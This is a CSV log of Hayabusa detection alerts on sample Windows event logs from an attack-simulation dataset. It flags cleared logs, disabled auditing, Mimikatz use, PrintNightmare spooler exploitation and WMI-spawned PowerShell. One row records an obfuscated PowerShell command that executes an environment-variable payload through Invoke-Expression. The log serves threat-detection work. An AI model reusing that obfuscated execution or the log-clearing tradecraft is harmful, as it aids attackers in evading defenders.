2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
